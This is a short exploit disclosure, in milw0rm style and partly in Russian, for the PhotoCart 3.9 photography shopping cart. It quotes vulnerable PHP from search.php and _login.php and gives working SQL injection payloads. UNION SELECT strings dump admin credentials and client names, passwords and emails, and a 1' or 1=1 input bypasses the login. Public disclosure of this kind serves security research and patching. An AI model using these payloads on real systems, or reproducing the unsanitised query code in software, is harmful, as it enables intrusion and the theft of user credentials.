Photocart 3.9 - Multiple SQL Injections

Author: ~!Dok_tOR!~
Date found: 18.08.08
Product: PhotoCart
Version: 3.9 возможно и более ранние версии
Type: Photography Shopping Cart
URL: www.picturespro.com
Vulnerability Class: SQL Injection

/[installdir]/search.php

Vuln code:

PHP:
if($_REQUEST['searchby'] == "qtitle") {
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' ";
print "Results for Gallery or event name: ".$_REQUEST['qtitle']." ";
}
if($_REQUEST['searchby'] == "qid") {
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' ";
print "Results for Gallery or event ID: ".$_REQUEST['qid']." ";
}
if($_REQUEST['searchby'] == "qdate") {
$gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday']."";
$gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' ";
print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." ";
}


magic_quotes_gpc = Off

Example:
http://[server]/[installdir]/search.php

Вводим в поле Gallery or event name:

Exploit 1:

' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/*



Exploit 2:

' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/*



Authentication Bypass SQL Injection

/[installdir]/_login.php

Vuln code:

PHP:
$result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'");


Email Address: 1' or 1=1/*
Password: 1' or 1=1/*

# milw0rm.com [2008-08-21]